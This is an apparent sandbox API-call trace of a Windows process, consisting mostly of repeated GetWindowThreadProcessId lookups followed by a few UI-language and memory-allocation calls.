	[0457.425] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x764
	[0457.425] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x820
	[0457.426] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x810
	[0457.426] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x794
	[0457.426] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x83c
	[0457.426] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x7ac
	[0457.426] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb44
	[0458.165] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb5c
	[0458.165] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x838
	[0458.166] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.167] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.167] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.167] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.168] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.168] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.168] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.169] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.169] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x818
	[0458.170] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x5b8
	[0458.170] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x494
	[0458.170] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1ec
	[0458.170] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x440
	[0458.171] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x7e8
	[0458.171] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x730
	[0458.171] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x2c8
	[0458.171] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x31c
	[0458.172] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x330
	[0458.172] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x128
	[0458.173] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x5c8
	[0458.173] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x6f8
	[0458.174] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x358
	[0458.174] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x73c
	[0458.175] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb0
	[0458.175] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x250
	[0458.175] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x240
	[0458.175] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x790
	[0458.176] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x61c
	[0458.176] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x540
	[0458.176] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x538
	[0458.176] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x568
	[0458.176] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x538
	[0458.177] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x568
	[0458.177] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x538
	[0458.177] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x540
	[0458.177] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x540
	[0458.177] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x57c
	[0458.177] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x460
	[0458.178] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x554
	[0458.178] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.178] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x528
	[0458.178] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.179] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.179] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.179] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x79c
	[0458.179] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.180] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4e0
	[0458.180] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.180] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x460
	[0458.180] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x460
	[0458.180] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x44c
	[0458.181] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x778
	[0458.181] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x460
	[0458.181] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x558
	[0458.181] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.182] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4d0
	[0458.182] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x16d0
	[0458.182] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x16d4
	[0458.182] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x15bc
	[0458.182] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x15a0
	[0458.183] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x159c
	[0458.184] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1598
	[0458.185] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1594
	[0458.185] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1590
	[0458.185] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x158c
	[0458.185] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1588
	[0458.186] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1584
	[0458.186] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1580
	[0458.187] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x157c
	[0458.189] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1488
	[0458.191] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1404
	[0458.192] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x11b8
	[0458.192] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xbd4
	[0458.192] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe0c
	[0458.192] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xd30
	[0458.192] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe70
	[0458.192] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x13b8
	[0458.193] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe20
	[0458.193] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe2c
	[0458.193] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe00
	[0458.193] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe04
	[0458.193] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc94
	[0458.193] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x13b0
	[0458.193] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x13ac
	[0458.193] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x13a8
	[0458.193] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1374
	[0458.193] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x132c
	[0458.194] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1328
	[0458.194] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x12d0
	[0458.194] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x12cc
	[0458.194] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x12c8
	[0458.194] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1290
	[0458.194] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1218
	[0458.194] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1214
	[0458.194] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x11ec
	[0458.194] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x11e8
	[0458.194] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x11cc
	[0458.195] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1140
	[0458.195] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe6c
	[0458.195] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x6e8
	[0458.195] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc6c
	[0458.195] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf94
	[0458.195] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xffc
	[0458.195] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf74
	[0458.195] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf08
	[0458.196] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf0c
	[0458.196] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xed8
	[0458.196] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xe90
	[0458.196] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xea8
	[0458.196] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xfa8
	[0458.196] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xfbc
	[0458.196] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xfb8
	[0458.196] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xfb4
	[0458.196] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xfb0
	[0458.197] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xfac
	[0458.197] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xfc0
	[0458.197] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xfd0
	[0458.197] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf88
	[0458.197] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf84
	[0458.197] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xf80
	[0458.197] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xde0
	[0458.197] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xddc
	[0458.197] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xdd8
	[0458.197] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xd34
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xd10
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xd0c
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc9c
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc74
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc1c
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xc08
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xabc
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x24c
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xbb0
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xbfc
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb10
	[0458.198] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x374
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x368
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb28
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xae8
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb14
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x95c
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa8c
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x46c
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb3c
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa90
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xad0
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa9c
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xaa0
	[0458.199] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb1c
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x7e0
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa74
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x694
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xa28
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x9b0
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x8d8
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x940
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x93c
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x4ec
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x150
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x720
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x3c4
	[0458.200] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x7d4
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x6c8
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb54
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb54
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0xb5c
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x838
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x818
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x5b8
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x494
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x1ec
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x440
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x7e8
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x730
	[0458.201] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x2c8
	[0458.202] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x31c
	[0458.202] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x330
	[0458.202] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x128
	[0458.202] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x5c8
	[0458.202] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x6f8
	[0458.202] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x358
	[0458.202] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1adc60 | out: lpdwProcessId=0x1adc60) returned 0x73c
	[0458.205] WerSetFlags () returned 0x0
	[0458.212] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0458.212] CoTaskMemFree (pv=0x0) 
	[0458.212] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1adfc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1adfc0 | out: pulNumLanguages=0x1adfc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1adfc0) returned 1
	[0458.212] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1adfc8, pwszLanguagesBuffer=0x2d5f130, pcchLanguagesBuffer=0x1adfc0 | out: pulNumLanguages=0x1adfc8, pwszLanguagesBuffer=0x2d5f130, pcchLanguagesBuffer=0x1adfc0) returned 1
	[0458.217] CoTaskMemAlloc (cb=0x24) returned 0x440e10
